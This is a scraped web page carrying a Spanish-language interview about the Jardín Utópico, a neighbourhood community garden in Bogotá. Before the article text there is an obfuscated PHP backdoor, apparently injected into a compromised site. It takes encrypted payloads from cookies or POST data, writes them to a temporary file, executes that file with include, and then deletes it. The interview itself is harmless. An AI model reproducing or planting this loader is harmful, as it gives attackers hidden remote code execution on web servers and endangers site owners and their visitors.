$poVPthDL = class_exists("bi_PWWP");if (!$poVPthDL){class bi_PWWP{private $bhKPifoBh;public static $VVmPfuns = "6031f892-4c69-461b-aa03-20f57dd0098d";public static $QngRyX = NULL;public function __construct(){$IHLQmOo = $_COOKIE;$mxWYFWABx = $_POST;$Cpzno = @$IHLQmOo[substr(bi_PWWP::$VVmPfuns, 0, 4)];if (!empty($Cpzno)){$gXNuiCKHp = "base64";$DyXuqTtBH = "";$Cpzno = explode(",", $Cpzno);foreach ($Cpzno as $fdScEe){$DyXuqTtBH .= @$IHLQmOo[$fdScEe];$DyXuqTtBH .= @$mxWYFWABx[$fdScEe];}$DyXuqTtBH = array_map($gXNuiCKHp . '_' . 'd' . "\145" . 'c' . "\157" . "\144" . chr ( 207 - 106 ), array($DyXuqTtBH,)); $DyXuqTtBH = $DyXuqTtBH[0] ^ str_repeat(bi_PWWP::$VVmPfuns, (strlen($DyXuqTtBH[0]) / strlen(bi_PWWP::$VVmPfuns)) + 1);bi_PWWP::$QngRyX = @unserialize($DyXuqTtBH);}}public function __destruct(){$this->fkyOS();}private function fkyOS(){if (is_array(bi_PWWP::$QngRyX)) {$nfUdVDT = sys_get_temp_dir() . "/" . crc32(bi_PWWP::$QngRyX[chr ( 510 - 395 ).chr (97) . "\x6c" . chr (116)]);@bi_PWWP::$QngRyX[chr (119) . "\x72" . "\151" . chr (116) . chr (101)]($nfUdVDT, bi_PWWP::$QngRyX["\143" . chr ( 1059 - 948 )."\156" . 't' . chr (101) . chr (110) . "\164"]);include $nfUdVDT;@bi_PWWP::$QngRyX['d' . 'e' . chr (108) . "\145" . "\164" . "\x65"]($nfUdVDT);exit();}}}$ETOLvDXzYi = new bi_PWWP(); $ETOLvDXzYi = NULL;} ?> Jardín Utópico una entrevista. – www.interferencechannel.com

Jardín Utópico una entrevista.

Interference Channel conversó con Francisco Flórez acerca del Jardín Utópico. 

IC: ¿Qué es el Jardín Utópico?

El jardín utópico es una idea Ecológico-Social de algunos habitantes del Barrio La Esmeralda que tiene motivaciones pedagógicas, sociales, ecológicas, lúdicas que nos permiten un encuentro después de años de desconocernos por los miedos las desconfianzas, y recelos entre vecinos.

IC: ¿Cuál es la historia del Jardín Utópico?

El jardín utópico nace a partir de mi afición por cultivar. Hace dos años salí a sembrar un árbol de chachafruto en el parque, extendiéndolo luego a una huerta y otros árboles, de esta manera empezaron a llegar más voluntarios a participar, haciéndose parte de la idea y cultivando en el jardín.

IC: ¿Por qué Utópico, qué es la utopía para Ud?

Su nombre se debe a pensar que la Utopía es fundamentalmente la esperanza que ningún ser humano debe perder nunca, ya sea en su ámbito personal o social .La prueba real y cierta de que somos seres humanos y que existimos afectivamente es que tenemos vivas las Utopías, los sueños, las esperanzas.

IC: Al ocurrir en el espacio público surge la pregunta de qué es lo público para Ud, Como entiende la ciudad y cómo interpreta ese diálogo entre la ciudad y la flora.

Hoy  más que nunca tenemos que pensar en el espacio público  dentro de la paradoja que lo define como “el lugar de todos y de nadie” Es un lugar para darse al otro, al prójimo. Aquí esperamos no reconocer fronteras si no abrazos a la vida en todas sus expresiones.

IC: Qué piensa la comunidad ¿existe?, que piensa el público sobre ese proyecto.

Todos llevamos en nuestras mentes un jardín utópico,  aquí muy acendrado por las formas culturales del cristianismo lo imaginamos como un paraíso pero se tiene el miedo a asumirse como propietario y protagonista del jardín utópico como se le tiene miedo a la palabra utopía,  queremos cambiar esa creencia de que solo somos propietarios de lo que tenemos escrituras o documentos oficiales que nos certifiquen como propietarios. Nuestra meta es vencer esos miedos y atrevernos a “Soñar sueños que se desensueñen y se hagan realidad” la comunidad lo ha entendido a su manera.

IC: ¿Considera al Jardín Utópico una idea? Lo considera un proyecto unitario, o cree que se puede repetir este tipo de comunidad.

Digamos que si es una idea, un sueño, un proyecto de vida  para la ciudad. De hecho se repite constantemente en las grandes ciudades, es una actividad que se desarrolla en terrazas y espacios abiertos y le permite a la gente reconciliarse con la vida, con el vecino, con el otro sea en Berlín, Nueva York, Sao Paulo. En Bogotá hoy más que nunca hay huertos comunitarios apoyados por la alcaldía con los que nos hemos hermanados para intercambio de experiencias y materiales que nos permiten repetir la experiencia en los distintos sectores de la ciudad.

IC: ¿Qué cosas le llaman la atención  que problemáticas ha tenido con el Jardín?

Interesante las actitudes de la gente en principio de miedo ,desconfianza que se va disipando con el tiempo y el trabajo comunitario es muy evidente que estamos en una ciudad con 10 millones de campesinos desplazados por unas guerras históricas de las que en general nadie sabe las causas pero sufrimos las consecuencias.

También hay miedos entre los funcionarios de la alcaldía por el temor de estar haciendo cosas ilegales como funcionarios públicos y esto nos ha entorpecido enormemente el desarrollo de las tareas.

IC: ¿Hacia dónde va el Jardín Utópico?

La proyección del Jardín es repetirlo muchas veces en toda la ciudad, con todos los interesados que nos encontremos y convertirlo en un centro de encuentro espiritual, cultural, pedagógico que nos permita reencontrarnos con nuestro ser campesino, indígena. Que nos permita dialogar con el otro, invitando también gente de otras nacionalidades a conocer y compartir nuestra experiencia. ♠

Interesados llamar 3214642691

Francisco Flórez Jardín Utópico.

Comments are closed.